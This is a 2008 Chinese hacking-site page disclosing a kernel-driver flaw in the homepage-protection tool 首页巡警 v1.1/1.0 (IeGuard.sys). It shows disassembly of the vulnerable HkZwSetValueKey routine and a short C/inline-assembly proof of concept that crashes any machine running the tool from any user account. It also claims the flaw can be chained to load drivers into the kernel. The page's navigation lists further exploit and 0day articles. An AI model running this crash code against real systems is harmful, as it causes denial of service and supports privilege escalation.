·	首页巡警v1.1/1.0 本地提	05-23	·	Firefox安全设置	05-23
·	火眼金睛如何识别系统恶	05-23	·	易联网络为您提供150m美	05-23
·	巧妙查看Windows Server	05-22	·	玩转卡巴斯基的19招，让	05-22
·	建立一个别人不能碰的无	05-21	·	卸诺顿 WinXP丢失IP无法	05-21
·	揭秘灰鸽子运行原理(含手	05-21	·	DIY QQ:想要啥样就改啥样	05-21
·	PCSHARE VIP 2005源代码	05-21	·	NBSI_1.157源代码	05-21
·	刷BIOS到EFI破解，Vista	05-21	·	弘毅网提供100M免费asp空	05-21
·	转移Vista脱机文件减压V	05-20	·	改进BitLocker浅谈Vista	05-20
·	巧妙几招，用好Windows	05-20	·	齐鲁科宇网提供20MB免费	05-20
·	解密网页加密的两个方法	05-19	·	Dedecms getip()的漏洞利	05-19
·	一个弹窗口的流氓软件源	05-19	·	C++ win32 下载者源码	05-19
·	经验谈:Vista高效冲浪，	05-19	·	灵活应用组策略禁用USB	05-19
·	DomainDLX提供100M免费A	05-19	·	MyPhpAdmin 执行攻击者代	05-16
·	PHP安全配置详解	05-16	·	把更快的Win 2008 降级成	05-16

[推荐]首页巡警v1.1/1.0 本地提权漏洞

荐 ★★★★

首页巡警v1.1/1.0 本地提权漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-23 9:56:56

首页巡警v1.1/1.0的内核驱动程序存在严重漏洞

安装了首页巡警v1.1(v1.0)的机器，任意权限的用户可导致系统蓝屏（BSOD），造成拒绝服务攻击

结合我之前公布的SystemCrashDumpInformation加载驱动方式，可以在安装了HIPS的机器上造成本地提权漏洞，即任意权限的用户可以加载驱动到内核并执行。

出问题的函数是IeGuard.sys!HkZwSetValueKey

该函数的第三个参数是PUNICODE_STRING ValueName

IeGuard没有对参数做任何检查就使用RtlCompareUnicodeString函数对该值进行判断，只要在RING3对此参数置0，IeGuard将立即导致系统蓝屏

相关汇编代码:

.text:00011430 HkZwSetValueKey proc near                ; DATA XREF: HookKeyRoutine+52 o
.text:00011430                                          ; sub_11B66+45 o
.text:00011430
.text:00011430 StartPageUniName= UNICODE_STRING ptr -14h
.text:00011430 var_C            = dword ptr -0Ch
.text:00011430 Object           = dword ptr -8
.text:00011430 isPass           = byte ptr -1
.text:00011430 Handle           = dword ptr  8
.text:00011430 ValueName        = dword ptr  0Ch
.text:00011430 arg_8            = dword ptr  10h
.text:00011430 arg_C            = dword ptr  14h
.text:00011430 arg_10           = dword ptr  18h
.text:00011430 arg_14           = dword ptr  1Ch
.text:00011430
.text:00011430                  mov      edi, edi
.text:00011432                  push     ebp
.text:00011433                  mov      ebp, esp
.text:00011435                  sub      esp, 14h
.text:00011438                  push     ebx
.text:00011439                  xor      ebx, ebx
.text:0001143B                  mov      [ebp+isPass], bl
.text:0001143E                  call     ds:ExGetPreviousMode
.text:00011444                  cmp      al, 1
.text:00011446                  jnz      loc_114FA
.text:00011446
.text:0001144C                  push     offset str_StartPage ; SourceString
.text:00011451                  lea      eax, [ebp+StartPageUniName]
.text:00011454                  push     eax              ; DestinationString
.text:00011455                  call     ds:RtlInitUnicodeString
.text:0001145B                  push     1                ; CaseInSensitive
.text:0001145D                  push     [ebp+ValueName] ; String2
.text:00011460                  lea      eax, [ebp+StartPageUniName]
.text:00011463                  push     eax              ; String1
.text:00011464                  call     ds:RtlCompareUnicodeString

<—此处未做任何判断就将ValueName传递给RtlCompareUnicodeString

导致蓝屏

.text:0001146A                  test     eax, eax
.text:0001146C                  jnz      loc_114FA

利用代码（该代码运行后即可导致安装了首页巡警的机器立即蓝屏，可在任意用户权限下执行）

HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwSetValueKey");
__asm
{
push 0
push 0
push 0
push 0
push 0
push 0
call p

}

测试程序下载: IeGuardLeakTest

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： MyPhpAdmin 执行攻击者代码漏洞

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04